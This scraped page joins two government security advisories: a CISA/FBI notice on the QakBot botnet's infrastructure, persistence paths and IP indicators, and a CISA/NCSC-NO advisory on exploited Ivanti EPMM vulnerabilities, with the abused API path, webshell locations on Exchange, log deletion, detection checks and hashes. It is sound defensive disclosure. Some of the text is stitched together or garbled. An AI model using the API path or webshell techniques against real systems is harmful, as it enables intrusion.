CISA and FBI encourage organizations to implement the recommendations in the Mitigations section to reduce the likelihood of QakBot-related activity and promote identification of QakBot-facilitated ransomware and malware infections. Note: The disruption of QakBot infrastructure does not mitigate other previously installed malware or ransomware on victim computers. If potential compromise is detected, administrators should apply the incident response recommendations included in this CSA and report key findings to a local FBI Field Office or CISA at cisa.gov/report.
Download the PDF version of this report:
For a downloadable copy of IOCs, see:
QakBot—also known as Qbot, Quackbot, Pinkslipbot, and TA570—is responsible for thousands of malware infections globally. QakBot has been the precursor to a significant amount of computer intrusions, to include ransomware and the compromise of user accounts within the Financial Sector. In existence since at least 2008, QakBot feeds into the global cybercriminal supply chain and has deep-rooted connections to the criminal ecosystem. QakBot was originally used as a banking trojan to steal banking credentials for account compromise; in most cases, it was delivered via phishing campaigns containing malicious attachments or links to download the malware, which would reside in memory once on the victim network.
Since its initial inception as a banking trojan, QakBot has evolved into a multi-purpose botnet and malware variant that provides threat actors with a wide range of capabilities, to include performing reconnaissance, engaging in lateral movement, gathering and exfiltrating data, and delivering other malicious payloads, including ransomware, on affected devices. QakBot has maintained persistence in the digital environment because of its modular nature. Access to QakBot-affected (victim) devices via compromised credentials are often sold to further the goals of the threat actor who delivered QakBot.
QakBot and affiliated variants have targeted the United States and other global infrastructures, including the Financial Services, Emergency Services, and Commercial Facilities Sectors, and the Election Infrastructure Subsector. FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood of QakBot-related infections and promote identification of QakBot-induced ransomware and malware infections. Disruption of the QakBot botnet does not mitigate other previously installed malware or ransomware on victim computers. If a potential compromise is detected, administrators should apply the incident response recommendations included in this CSA and report key findings to CISA and FBI.
QakBot’s modular structure allows for various malicious features, including process and web injection, victim network enumeration and credential stealing, and the delivery of follow-on payloads such as Cobalt Strike[1], Brute Ratel, and other malware. QakBot infections are particularly known to precede the deployment of human-operated ransomware, including Conti[2], ProLock[3], Egregor[4], REvil[5], MegaCortex[6], Black Basta[7], Royal[8], and PwndLocker.
Historically, QakBot’s C2 infrastructure relied heavily on using hosting providers for its own infrastructure and malicious activity. These providers lease servers to malicious threat actors, ignore abuse complaints, and do not cooperate with law enforcement. At any given time, thousands of victim computers running Microsoft Windows were infected with QakBot—the botnet was controlled through three tiers of C2 servers.
The first tier of C2 servers includes a subset of thousands of bots selected by QakBot administrators, which are promoted to Tier 1 “supernodes” by downloading an additional software module. These supernodes communicate with the victim computers to relay commands and communications between the upstream C2 servers and the infected computers. As of mid-June 2023, 853 supernodes have been identified in 63 countries, which were active that same month. Supernodes have been observed frequently changing, which assists QakBot in evading detection by network defenders. Each bot has been observed communicating with a set of Tier 1 supernodes to relay communications to the Tier 2 C2 servers, serving as proxies to conceal the main C2 server. The Tier 3 server controls all of the bots.
FBI has observed the following threat actor tactics, techniques, and procedures (TTPs) in association with OakBot infections:
HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionRun
C:UsersAppDataRoamingMicrosoft
HKEY_CURRENT_USERSoftwareMicrosoft
In addition, the below IP addresses were assessed to have obtained access to victim computers. Organizations are encouraged to review any connections with these IP addresses, which could potentially indicate a QakBot and/or follow-on malware infection.
Disclaimer: The below IP addresses are assessed to be inactive as of August 29, 2023. Several of these observed IP addresses were first observed as early as 2020, although most date from 2022 or 2023, and have been historically linked to QakBot. FBI and CISA recommend these IP addresses be investigated or vetted by organizations prior to taking action, such as blocking.
IP Address |
First Seen |
---|---|
85.14.243[.]111 |
April 2020 |
51.38.62[.]181 |
April 2021 |
51.38.62[.]182 |
December 2021 |
185.4.67[.]6 |
April 2022 |
62.141.42[.]36 |
April 2022 |
87.117.247[.]41 |
May 2022 |
89.163.212[.]111 |
May 2022 |
193.29.187[.]57 |
May 2022 |
193.201.9[.]93 |
June 2022 |
94.198.50[.]147 |
August 2022 |
94.198.50[.]210 |
August 2022 |
188.127.243[.]130 |
September 2022 |
188.127.243[.]133 |
September 2022 |
94.198.51[.]202 |
October 2022 |
188.127.242[.]119 |
November 2022 |
188.127.242[.]178 |
November 2022 |
87.117.247[.]41 |
December 2022 |
190.2.143[.]38 |
December 2022 |
51.161.202[.]232 |
January 2023 |
51.195.49[.]228 |
January 2023 |
188.127.243[.]148 |
January 2023 |
23.236.181[.]102 |
Unknown |
45.84.224[.]23 |
Unknown |
46.151.30[.]109 |
Unknown |
94.103.85[.]86 |
Unknown |
94.198.53[.]17 |
Unknown |
95.211.95[.]14 |
Unknown |
95.211.172[.]6 |
Unknown |
95.211.172[.]7 |
Unknown |
95.211.172[.]86 |
Unknown |
95.211.172[.]108 |
Unknown |
95.211.172[.]109 |
Unknown |
95.211.198[.]177 |
Unknown |
95.211.250[.]97 |
Unknown |
95.211.250[.]98 |
Unknown |
95.211.250[.]117 |
Unknown |
185.81.114[.]188 |
Unknown |
188.127.243[.]145 |
Unknown |
188.127.243[.]147 |
Unknown |
188.127.243[.]193 |
Unknown |
188.241.58[.]140 |
Unknown |
193.29.187[.]41 |
Unknown |
Organizations are also encouraged to review the Qbot/QakBot Malware presentation from the U.S. Department of Health & Human Services Cybersecurity Program for additional information.
For detailed associated software descriptions, tactics used, and groups that have been observed using this software, see MITRE ATT&CK’s page on QakBot.[9]
Note: For situational awareness, the following SHA-256 hash is associated with FBI’s QakBot uninstaller: 7cdee5a583eacf24b1f142413aabb4e556ccf4ef3a4764ad084c1526cc90e117
CISA and FBI recommend network defenders apply the following mitigations to reduce the likelihood of QakBot-related activity and promote identification of QakBot-induced ransomware and malware infections. Disruption of the QakBot botnet does not mitigate other already-installed malware or ransomware on victim computers. Note: These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats and TTPs. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
In addition to applying mitigations, CISA and FBI recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA and FBI also recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
CISA and FBI recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques.
FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with QakBot-affiliated actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. FBI and CISA do not encourage paying ransom, as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI and CISA urge you to promptly report ransomware incidents to a local FBI Field Office or CISA at cisa.gov/report.
The information in this report is being provided “as is” for informational purposes only. CISA and FBI do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and FBI.
August 30, 2023: Initial version.
The Cybersecurity and Infrastructure Security Agency (CISA) and the Norwegian National Cyber Security Centre (NCSC-NO) are releasing this joint Cybersecurity Advisory (CSA) in response to active exploitation of CVE-2023-35078 and CVE-2023-35081. Advanced persistent threat (APT) actors exploited CVE-2023-35078 as a zero day from at least April 2023 through July 2023 to gather information from several Norwegian organizations, as well as to gain access to and compromise a Norwegian government agency’s network.
Ivanti released a patch for CVE-2023-35078 on July 23, 2023. Ivanti later determined actors could use CVE-2023-35078 in conjunction with another vulnerability CVE-2023-35081 and released a patch for the second vulnerability on July 28, 2023. NCSC-NO observed possible vulnerability chaining of CVE-2023-35081 and CVE-2023-35078.
CVE-2023-35078 is a critical vulnerability affecting Ivanti Endpoint Manager Mobile (EPMM) (formerly known as MobileIron Core). The vulnerability allows threat actors to access personally identifiable information (PII) and gain the ability to make configuration changes on compromised systems. CVE-2023-35081 enables actors with EPMM administrator privileges to write arbitrary files with the operating system privileges of the EPMM web application server. Threat actors can chain these vulnerabilities to gain initial, privileged access to EPMM systems and execute uploaded files, such as webshells.
Mobile device management (MDM) systems are attractive targets for threat actors because they provide elevated access to thousands of mobile devices, and APT actors have exploited a previous MobileIron vulnerability. Consequently, CISA and NCSC-NO are concerned about the potential for widespread exploitation in government and private sector networks.
This CSA provides indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) obtained by NCSC-NO investigations. The CSA also includes a nuclei template to identify unpatched devices and detection guidance organizations can use to hunt for compromise. CISA and NCSC-NO encourage organizations to hunt for malicious activity using the detection guidance in this CSA. If potential compromise is detected, organizations should apply the incident response recommendations included in this CSA. If no compromise is detected, organizations should still immediately apply patches released by Ivanti.
Download the PDF version of this report:
Download the .xml or .json file associated with this report:
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 13. See the MITRE ATT&CK Tactics and Techniques section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
In July 2023, NCSC-NO became aware of APT actors exploiting a zero-day vulnerability in Ivanti Endpoint Manager (EPMM), formerly known as MobileIron Core, to target a Norwegian government network. Ivanti confirmed that the threat actors exploited CVE-2023-35078 and released a patch on July 23, 2023.[1] Ivanti later determined actors could use CVE-2023-35078 in conjunction with another vulnerability, CVE-2023-35081, and released a patch for the second vulnerability on July 28, 2023.[2]
CVE-2023-35078 is a critical authentication bypass [CWE-288] vulnerability affecting Ivanti Endpoint Manager Mobile (EPMM), formerly known as MobileIron Core. The vulnerability allows unauthenticated access to specific application programming interface (API) paths. Threat actors with access to these API paths can access PII such as names, phone numbers, and other mobile device details of users on the vulnerable system; make configuration changes to vulnerable systems; push new packages to mobile endpoints; and access Global Positioning System (GPS) data if enabled.
According to Ivanti, CVE-2023-35078 can be chained with a second vulnerability CVE-2023-35081.[2] CVE-2023-35081 is directory traversal vulnerability [CWE-22] in EPMM. This vulnerability allows threat actors with EPMM administrator privileges the capability to write arbitrary files, such as webshells, with operating system privileges of the EPMM web application server. The actors can then execute the uploaded file.[2]
CISA added CVE-2023-35078 to its Known Exploited Vulnerabilities Catalog on July 25, 2023, and CVE-2023-35081 on July 31, 2023.
CISA and NCSC-NO are concerned about the potential for widespread exploitation of both vulnerabilities in government and private sector networks because MDM systems provide elevated access to thousands of mobile devices. Threat actors, including APT actors, have previously exploited a MobileIron vulnerability [3],[4].
The APT actors have exploited CVE-2023-35078 since at least April 2023. The actors leveraged compromised small office/home office (SOHO) routers, including ASUS routers, to proxy [T1090] to target infrastructure, and NCSC-NO observed the actors exploiting CVE-2023-35078 to obtain initial access to EPMM devices [T1190] and:
/mifs/aad/api/v2/authorized/users
to list users and administrators [T1087.002] on the EPMM device.The APT actors deleted some of their entries in Apache httpd logs [T1070] using mi.war
, a malicious Tomcat application that deletes log entries based on the string in keywords.txt
. The actors deleted log entries with the string Firefox/107.0
.
The APT actors used Linux and Windows user agents with Firefox/107.0
to communicate with EPMM. Other agents were used; however, these user agents did not appear in the device logs. It is unconfirmed how the threat actors ran shell commands on the EPMM device; however, NCSC-NO suspects the actors exploited CVE-2023-35081 to upload webshells on the EPMM device and run commands [T1059].
The APT actors tunneled traffic [T1572] from the internet through Ivanti Sentry, an application gateway appliance that supports EPMM, to at least one Exchange server that was not accessible from the internet [T1090.001]. It is unknown how they tunneled traffic. NCSC-NO observed that the network traffic used the TLS certificate of the internal Exchange server. The APT actors likely installed webshells [T1505.003] on the Exchange server in the following paths [T1036.005]:
/owa/auth/logon.aspx
/owa/auth/logoff.aspx
/owa/auth/OutlookCN.aspx
NCSC-NO also observed mi.war
on Ivanti Sentry but do not know how the actors placed it there.
See Table 1—Table 7 for all referenced threat actor tactics and techniques in this advisory.
Technique Title |
ID |
Use |
---|---|---|
Exploit Public-Facing Application |
The APT actors exploited CVE-2023-35078 in public facing Ivanti EPMM appliances since at least April 2023. |
Technique Title |
ID |
Use |
---|---|---|
Command and Scripting Interpreter |
The APT actors may have exploited CVE-2023-35081 to upload webshells on the EPMM device and run commands. |
Technique Title |
ID |
Use |
---|---|---|
Account Discovery: Domain Account |
The APT actors exploited CVE-2023-35078 to gather EPMM device users and administrators. |
|
Remote System Discovery |
The APT actors retrieved LDAP endpoints. |
Technique Title |
ID |
Use |
---|---|---|
Masquerading: Match Legitimate Name or Location |
The APT actors likely installed webshells at legitimate Exchange server paths. |
|
Server Software Component: Web Shell |
The APT actors implanted webshells on the compromised infrastructure. |
Technique Title |
ID |
Use |
---|---|---|
Indicator Removal |
APT actors deleted httpd access logs after the malicious activities took place using string |
Technique Title |
ID |
Use |
---|---|---|
Data from Local System |
APT actors regularly checked EPMM Core audit logs. |
Technique Title |
ID |
Use |
---|---|---|
Protocol Tunneling |
The APT actors tunneled traffic from the internet to an Exchange server that was not accessible from the internet. |
|
Proxy |
The actors leveraged compromised SOHO routers to proxy to and compromise infrastructure. The actors tunneled traffic from the internet to at least one Exchange server. |
|
Proxy: Internal Proxy |
The APT actors tunneled traffic from the internet to an Exchange server that was not accessible from the internet. |
CISA recommends administrators use the following CISA-developed nuclei template to determine vulnerability to CVE-2023-30578:
|
CISA recommends administrators use the following CISA-developed nuclei template to determine vulnerability to CVE-2023-35081:
|
Run the following NCSC-NO-created checks to check for signs of compromise:
syslogs
from EPMM devices for any occurrences of /mifs/aad/api/v2/
.EventCode=1644
in the AD since at least April 2023. The LDAP queries performed by EPMM when the threat actor used the MIFS API generated tens of millions of this event code. Also look for EventCodes 4662
, 5136
, and 1153
.CN=EXCHANGE01
or similar.If compromise is detected, organizations should:
CISA and NCSC-NO recommend organizations:
# install rpm url https://support.mobileiron.com/ivanti-updates/ivanti-security-update-1.0.0-1.noarch.rp
In addition to applying mitigations, CISA and NCSC-NO recommends exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
CISA recommends continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
[1] Ivanti: CVE-2023-35078 – Remote Unauthenticated API Access Vulnerability
[2] Ivanti: CVE-2023-35081 – Remote Arbitrary File Write
[3] CISA: Potential for China Cyber Response to Heightened U.S.-China Tensions
[4] CISA: Top Routinely Exploited Vulnerabilities
Ivanti contributed to this joint advisory.
NCSC-NO wishes to acknowledge Mnemonic’s contributions.
August 1, 2023: Initial version.
August 2, 2023: Added stix file, updated Acknowledgements section, and added Resources section.
NCSC-NO observed the following webshell hash:
c0b42bbd06d6e25dfe8faebd735944714b421388 |
NCSC-NO observed the following hash of mi.war
:
1cd358d28b626b7a23b9fd4944e29077c265db46 |
NCSC-NO observed the following JA3 hashes used against MobileIron Core:
2d5bd942ebf308df61e1572861d146f6 473cd7cb9faa642487833865d516e578 579ccef312d18482fc42e2b822ca2430 849d3331f3e07a0797a02f12a6a82aa9 8d9f7747675e24454cd9b7ed35c58707 ad55557b7cbd735c2627f7ebb3b3d493 cd08e31494f9531f560d64c695473da9 e1d8b04eeb8ef3954ec4f49267a783ef e60dc8370ecf78cf115162fbc257baf5 e669667efb41c36f714c309243f41ca7 e84a32d43db750b206cb6beed08281d0 eb5fdc72f0a76657dc6ea233190c4e1c |
NCSC-NO observed the following JA3 hashes used against Exchange when tunneling via EPMM Sentry:
0092ce298a1d451fbe93dc4237053a96 00e872019b976e69a874ee7433038754 01ecd9ab9be75e832c83c082be3bdf18 0212a88c7ed149febdefa347c610b248 02be3b93640437dbba47cc7ed5ab7895 03f8852448a85e14f2b4362194160c32 045f8ccdac6d4e769b30da406808da71 04e7f5787f89a597001b50a37b9f8078 070f9fe9f0ec69e6b8791d280fde6a48 07a624d7236cca3934cf1f8e44b74b52 09df72c01a1a0ad193e2fff8e454c9c4 0b28842d64a344c287e6165647f3b3fe 0b8e1211de50d244b89e6c1b366d3ccf 0cb0380cf75a863b3e40a0955b1ada9f 0da24834056873a8cd8311000088e8be 0e1fad8ffaa7a939f0a6cbf9cd7e2fcd 0f6e78839398c245d13f696a3216d840 119f8c9050d1499b6f958b857868b8ce 11c506d5e3fb7e119c4287202c96a930 1336df27f94b25a25acac9db3e61e461 14671c3f8deca7d73a03b74cb854c21d 146caf9bd0153428f54e9ef472154983 14994353f3ea6fd25952a8c7d57f9ecf 151bc875df15d1385e6eb02f9edaba06 15a074a397727b26a846b443b99c20ff 1660f3d882a4311ca013ee4586e01fd9 16a74fc216f8a4ce43466bb83b6d3fd2 188623fdd056c4ed13d1ff34c7377637 19f51486abd40c9f0fc0503559a6c523 1a024e63721c610d2e54e67d62cd5460 1aa7dae8f2ae0a29402ed51819f82db4 1abfdeaadb74a0f7c461e7bab157b17f 1b6720ed0b67c910a80722ce973d6217 1b7d9368c6ce7623fdbc43f013626535 1e0850e10a00c9bbdd5c582ff4cb6833 1ec71612e438cf902913eec993475eb9 206fed3a39d9215c35395663f5bb3307 22cc1b3bc9f99d3a520ae58fee79a0d5 23e3e6fa8b23d9bc19e82de4e64c79e9 253fd4659bf21be116858bc0f206c5b9 276e175d4fe8454c4c47e966d8cb3fa3 289a450c7478dd52a10c6ed2fb47f7e9 2aa8ba7478b1362274666d714df575bc 2beecb6b9e386f29d568229a9953c3d2 2ebc7fdceaa9a0df556e989d77157006 3003024afe64b4e8a5a30825c14bbb12 3082e669dda9d023e2dcd8b9549a84a8 309d33c6f77a3fc75654c44c61596ccd 30a9f568eb3df79352fc587a078623b6 30be84e6b95f44c203f8e7fce7339a8e 3268a5097a543c7dbd82c39a9193b7fe 32775ead3ea1ad7db2f4bea67fe0cabb 34ac9a6ef5d285119abec50fbe41fcfe 34d92552e278710c1e84f0bd8dc3a6b8 361f47a6357cc6e3a9bcdd20cfaaf0e9 3685abc75517e61e47e52e5f2d060f54 3744004013135b9f9a05cb58cda8134d 37d952966ea7e79277803f13d7147544 391a4c2c7541b8b78e2f99bf586e9794 393662e5aa0cb49c5d666a6d10a1ade6 3962b622c5aa815afb803b92aa948424 3b22af324abded2781ed8f6a61f3654f 3b30b4555cc8b4b164ad03cf322cbea8 3bd1bdb5e90b9590a8878bff2ada8204 3be529eb3a7daaf34f963a22188f6139 3dd13faad1c45eb0c23e4567210f7eac 403273b51f91cf3c333695e5532cb2c3 404f56045e436d53ead2177bf957ba39 41854adbc73b0b58e5c566f60bb0df25 43c22dabb1e6d2449a39c2f7e974d537 476e72bbda5b78d188766139889e3038 4898a51256ae7d914a5ffd5695973470 49230c486f0fd383cd301fe162d6a786 4959a611b9885022d81b4bc8e4b1d149 495c6ff7ca0379ad0891bac47917d09a 49d2bd08038dc7dada221008591940f9 4c1b73ec52e6eec0c5d20577fcbc9ef1 4d34db639ba84b11822fb3dac47ed7d1 5244b163f9326a1e5eaa8860f7543f99 539f1a5183800a96228458932f9307f7 5466368d4659f1b1470bcb09e65b484d 549cde6535a884126755fc53f59a820c 555389e92c622b87d3fc395fd8723501 588d0b42e54174a98e1eca59945e8b32 58bc21d305a65c41745327f142f3ac12 59401c9a60449c742d073d93d1b7039a 59eec218522cc5c7743a0d37892a3345 59faf75430e9326d3ae9d231bb3ae8c6 5d0259ca16cfc2d7d1b0fac69f29ab05 5d55026fb84dba91ac01e2095504b1bc 5e35f50c692081fd6c7ddac1272e2d6c 5f4d5965af741bba59b7c8d3425f33dd 6010282004917ecf3900babf61456432 6088c2a04c94cdcd5a283a6d1622ffba 61dee38d2f97220efb1218ad8971e3ab 62ac194f2526eb45485526bca35c8f43 634296a023280d020674c873d0199760 635755dadfab8b92fb502aafb09122db 63fc58be0d7b48eaa34da7f752ae8ae6 6441640409815cfb4bf469e685e1bdb5 646973d1928c401ba80961c12cbf84a2 65eef0a0ee257254ef0418aa57192cfb 66f6a192083a7ab00ae8e0b5cc52e8f4 67a42e2e27ffc26d1f3d0ceb8384afd0 689385f1218e0d4c347595648ca6a776 692f91c0c5e9e93e0a24bd3392887ca1 69ecf52960c8bd9e746dfe9ee19c11f6 6e359f3bbc622e9b1ed36f6e3d521bcf 6e3650528f719fc50988a1f697644832 6ead0d5d3f87911c27f3ae0a75e6b5bc 6f1fa8b444caf0d8238f948279ca74e1 6fb8cdf567dd7d89d53b5771d769cb5f 706b6055658aff067ae370f23831ef6b 708140c311d3d69418f75c928e7535a0 719ec5da8f2153a436ee8567ff609894 7292ef4cdca529071fad97496e1c9439 74871691eac48156ce0da2cfa3ab401a 74cf24f2a66a31c88b6fcfe01f12160c 75e874d8e0a79697633b87ea5e798b1c 76c0d09fed2f33babb0de8ee2c07144c 77a01363fa2b29af25c004da9570e23c 78988c65e9b70e7929e747408d8f0b0e 79c6d12d168b85437384b20eb94e106b 7b4137b4e85f31a81bb5bafeda993947 7b9db1d58326c1fa276ba2a39bcc2617 7cbc7459db5327c26476549f225030f5 7cd727171c2522f51417edeeba4f1791 7e3630c67c802eabb67b108ad4d7ded7 802f5d34c230da40c0912a1c5a9b702b 80bd0f3610f6c4d60584a5be0b8a3016 819030799f0020ed724c2ef3ffaa56c6 8207129585da68066ed08e94216d76ee 821f649d08687e22f96cea99fbb5d3a3 830838cb0620d659405a74401cd72557 833d3201066f5184c874c73a2083c448 840f488b7c0a5d686d1e89908735f354 84301b967a4d9a242466c04901bad691 85c3fac6a9885362c448f434671e362f 883b9fe16e45c388968defc73a5fba7a 8a6b0ba3496eeca39d6d3f9bae830c90 8ad0fd4b78c89bd63b97343fda1eeccb 8b0ae9029974091df12210255aaecad6 8b297f8b219e968932293ee7a8242ca3 8bb1781e756a53cd00d9b2ec670fa21e 8d5515351afdf27b013f96a05bf45147 8fafa73e9985e05d0c1c964da770c567 905967b08bd44cfa60d969229921ac23 9188ef45ea917a91ec9b92b5dd8cd90d 918dfab0333ae15d61f14fd24b5eaaac 922a3272aad17c9eaad733696a4321da 9253399537fad8448f1d4732dd79f6fa 934a8a6528e91caa019acb76e791a71d 95588e0386206fa02912cfcaf18c1220 9610328cdaa4694800c2c93410f8ce82 9622902cc43f4a20d0d686a37e4d8232 96c41e4c4a1812187fb279b9299ad63b 984c4653a563b19c87f264611a6adc01 9980febfaf901d4113a1c473f79d7eb6 9a176d818edff838fc057cea3ee372c0 9ba21c5148913186a5bf877078cbc048 9cfda02ef7e04c469b77f8197a249c17 9d74d395bd2f72a47a5c980e6040df5a 9df128ebe0c82064aa746647883112c9 9e5613533972a9d42d2e3344a4e58566 9ec17429eed5446e3720796ab50d8c60 9f2438aaab4744c4b7b5b7287a783099 9f3bf94572344b36f6ef1689cb30c66e 9fdd7a85b3a4ef8ded73beb3e6218109 a1b732a9af792f75a68ed78d72ffb8f6 a260d836428cdb971bdf147ca6940160 a4f11b1eb659869a0ae70898a4a0e5ee a596ebbcf438980c880d711315e4fdf1 a80b6a354b493264f37aa39d0d41b5fc a89df6156eb5a2de196388d4a123b470 a96837fe533247abb7f88000d0216a50 a98cf0a359f430a00f4f3d522f5b6cc0 aa2fe3a253e169b05e1782ca57a688d2 aef0172a2c03f77912de0bbf14aee00f af06c3e72f2f307515ba549174d8e5a6 b311ab82b30f41b12cb9089d00c4a1ff b4f31423445b5f13675f205ac997f41f b50666c9aed1c2f222c56b6e9b326d27 b53f179b3f25f72bb0c7ccf45bf8beee b57f3e41c03803306b0ee2111f7ef823 b79434613820faf30d58f103c4415a29 b8366aaa5ed51c0dea3fc90ef7e14889 b8f6b0d234a305c25411e83fd430c624 b956ed2b848dabb4e79ab7358233861b b9ecb08402df0f1f6e1ce76b8ad6e91f ba4a616c8d4ab9358a82b321d8e618bf bcd62f3e029f96f62c24d50d2d1402ac bcf75736d176394f3df69f3e0ef7dd9f be1f24457141d80206bc2e58f55dc879 c013f308d170aa2eca4a5b0f0bbd3ccb c0a2fd066c955137036f92da2c3a3ff1 c17b3ec40ed5216e44311138aafaea2c c262a39f49604f05a5656213f758cd46 c66f36eb180438882133717c3abb5157 c986c7bf720ce1463c3d628d2b3dad01 c9c16287cbbe5a037244e374ba84aecc cbcd728a2350712b5747cd3447473deb cbeeb123efe8cf7f842426b673415c28 ccb15eef4287c8efa472915bcb4ec458 ccdddb69e9344a039c4ac9c49a6f2d7b cd1312be032256a10cf866af3e9afae9 ce0dd163d9e02bfd42d61024523cb134 ceef2e728db1b5ae15432f844eeb66e1 d12d98a0877f6e3c8b5a59f41cc4de9b d131f17689f1f585e9bfdcdb72a626bb d173076d97a0400a56c81089912b9218 d255291bb8e460626cb906ebacc670e5 d2cea317778ad6412c458a8a33b964fd d3cfee76468a9556fd9d017c1c8ee028 d3d72f4c7038f7313ad0570e16c293bf d485a1b5db2f97dc56500376d677aa89 d662d20507bebc37b99a4d413afa2752 d711d577b9943ab4e2f8a2e06bb963e3 d92e87d2689957765987e2be732d728e d966c6c822122e96f6e9f5f1d4778391 daee31d7cc6e08ead6afad2175989e1d dbb293176747fa1c2e03cbc09433f236 dc26ef761c7ec40591b1fe6e561b521d dc9e6edeb7557bc80be68be15cebb77a dddfbae77336120febd5ad690af3e341 e1f579227327ebb21cde3f9e7511db01 e3c642432a815a07f035e01308aaa8fc e54329351788661f2a8d4677a759fc42 e82b7ad2c05f4617efbc86a78c1e61e9 e99cffa2afa064625f09e1c5aca8f961 ea6bd3db104ca210b5ad947d46134aaf eb277d809a59d39d02605c0edd9333e9 ed82a50d98700179c8ae70429457477a ef35374f4146b3532f0902d6f7f0ef8c ef4c4d79f02ac404f47513d3a73e20c7 f05a5a60ad6f92d6f28fa4f13ded952f f0776dfe17867709fdb0e0183ed71698 f20fbfd508e24d50522eadf0186b03eb f3d751b0585855077b46dfce226cfea1 f4dd9bb28d680a3368136fb3755e7ea9 f804388f302af1f999e4664543c885a1 f8bcc8f99a3afde66d7f5afb5d8f1b43 f8d6f89aecf792e844e72015c9f27c95 f967460f8c6de1cedb180c90c98bfe98 f9d5cc0cbae77ea1a371131f62662b6b fa4f1a3b215888bc5f19b9f91ba37519 fdff2bf247a7dad40bac228853d5a661 fe6e7fac4f0b4f25d215e28ca8a22957 fe9de1cdd645971c5d15ee1873c3ff8d febba89b4b9a9649b3a3bf41c4c7d853 |
NCSC-NO observed the following user agents communicating with Exchange (OWA and EWS):
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67 |
NCSC-NO observed the following user agents communicating with Exchange webshell:
Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8A306 Safari/6531.22.7 Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Mozilla/5.0 (Linux; Android 7.0; Moto C Build/NRD90M.059) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.02272.101 Safari/537.36 Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG SM-J120M Build/LMY47X) AppleWebKit/537.36 (KHTML, Like Gecko) SamsungBrowser/6.4 Chrome/56.0.2924.87 Mobile Safari/537.36 Mozilla/5.0 (iPhone; CPU iPhone OS 9_0_2 like Mac OS X) AppleWebKit/601.1.45 (KHTML, like Gecko) Version/9.0 Mobile/13A452 Safari/601.1 |
NCSC-NO observed the following user agents communicating with Exchange Autodiscover:
ExchangeServicesClient/15.00.0913.015 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Firefox/114.0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.0.0 |
NCSC-NO observed the following user agents communicating with EWS (/ews/Exchange.asmx):
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36 Edg/103.0.1264.49 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67 |
NCSC-NO observed the following user agent communicating with Exchange (/powershell):
Windows WinRM Client |
Cookie | Duration | Description |
---|---|---|
cookielawinfo-checkbox-analytics | 11 months | This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Analytics". |
cookielawinfo-checkbox-functional | 11 months | The cookie is set by GDPR cookie consent to record the user consent for the cookies in the category "Functional". |
cookielawinfo-checkbox-necessary | 11 months | This cookie is set by GDPR Cookie Consent plugin. The cookies is used to store the user consent for the cookies in the category "Necessary". |
cookielawinfo-checkbox-others | 11 months | This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Other. |
cookielawinfo-checkbox-performance | 11 months | This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Performance". |
viewed_cookie_policy | 11 months | The cookie is set by the GDPR Cookie Consent plugin and is used to store whether or not user has consented to the use of cookies. It does not store any personal data. |